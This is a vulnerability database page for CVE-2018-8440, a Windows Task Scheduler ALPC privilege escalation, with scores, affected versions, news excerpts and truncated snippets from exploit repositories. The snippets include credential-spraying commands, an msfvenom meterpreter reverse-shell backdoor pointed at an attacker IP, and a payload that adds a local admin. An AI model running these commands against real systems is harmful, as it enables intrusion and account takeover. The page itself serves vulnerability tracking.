7.2
CVSSv2

CVE-2018-8440

Published: 13/09/2018 Updated: 03/10/2019
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
CVSS v3 Base Score: 7.8 | Impact Score: 5.9 | Exploitability Score: 1.8
VMScore: 643
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

An elevation of privilege vulnerability exists when Windows improperly handles calls to Advanced Local Procedure Call (ALPC), aka "Windows ALPC Elevation of Privilege Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

microsoft windows 10 1703

microsoft windows 10 1803

microsoft windows server 2012 r2

microsoft windows server 2016 1709

microsoft windows 10 -

microsoft windows 10 1607

microsoft windows 8.1 -

microsoft windows rt 8.1 -

microsoft windows server 2008 -

microsoft windows server 2008 r2

microsoft windows server 2012 -

microsoft windows 10 1709

microsoft windows 7 -

microsoft windows server 2016 -

microsoft windows server 2016 1803

Exploits

On vulnerable versions of Windows the alpc endpoint method SchRpcSetSecurity implemented by the task scheduler service can be used to write arbitrary DACLs to job files located in c:\windows\tasks because the scheduler does not use impersonation when checking this location Since users can create files in the c:\windows\tasks folder, a hardlink ca ...

Github Repositories

RedTeam-CheatSheet SSH - 22 Tunneling ssh -L 8443:127001:8443 user@xxxx Credentials Spraying ncrack -U userstxt -P passtxt ssh://xxxx hydra -L /Usernamestxt -P Passwordstxt ssh://xxxx DNS - 53 Perform DNS Zone Transfer check dig axfr xx

A PowerShell example of the Windows zero day priv esc

Usage Set-ExecutionPolicy Bypass Process \exploitps1 -TargetFile C:\Windows\Somedll This will exploit the Windows operating system allowing you to modify the file Somedll Example Set-ExecutionPolicy Bypass Process \exampleps1 youtube/rNSpxJd3_BM Finding Vulnerable DLL files $aapsid =

CVE-2018-8440 standalone exploit

CVE-2018-8440 Since I noticed that metasploit is using the dll lib provided by SandboxEscaper and only has a target for x64, I decided to share my poc to the community Of course there are much better vectors than targeting the print spooler, but I'll leave that as an exercise for the reader This is a standalone poc executable that was tested on x86 (I needed it for a cli

Metasploit-Note CVE-2018-8440 Attacker IP : 19216811 Victim IP : 19216812 Victim OS : Windows 10x64 Step 1 產生後門程式 $ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=19216811 LPORT=4444 -f exe > backdoorexe Step 2 監聽回傳設定 $ msfconsole msf > use m

Task Scheduler LPE from SandboxEscaper

All credit goes to SandboxEscaper Added a payloaddll (exploitdll in the project) that adds local admin using WinExec This won't crash spoolsvexe unlike msf and cobalt payloads, probably because these don't return true or exit on process which terminates spools I have not updated the SLN file to account for renamed payload files or directories You probably need t

Recent Articles

IT threat evolution Q3 2018. Statistics
Securelist • Victor Chebyshev Fedor Sinitsyn Denis Parinov Oleg Kupreev Evgeny Lopatin Alexander Liskin • 12 Nov 2018

These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data. According to Kaspersky Security Network: Perhaps the biggest news of the reporting period was the Trojan-Banker.AndroidOS.Asacub epidemic. It peaked in September when more than 250,000 unique users were attacked – and that only includes statistics for those with Kaspersky Lab’s mobile products installed on their devices. Number of users attacked by the mob...

It's September 2018, and Windows VMs can pwn their host servers by launching an evil app
The Register • Shaun Nichols in San Francisco • 11 Sep 2018

Too smart? There's also an old-fashioned image file RCE Safari, Edge fans: Is that really the website you think you're visiting? URL spoof bug blabbed

Admins will again be working overtime as Microsoft and Adobe have posted their monthly scheduled security updates for September. This month's Patch Tuesday bundle includes critical fixes for Windows, SQL Server, and Hyper V, as well as Flash and Cold Fusion. In total, Microsoft addressed 61 CVE-listed vulnerabilities this month, including 23 that would potentially allow for remote code execution. One of the more noteworthy of those bugs is CVE-2018-8475, a remote code flaw that can be triggered ...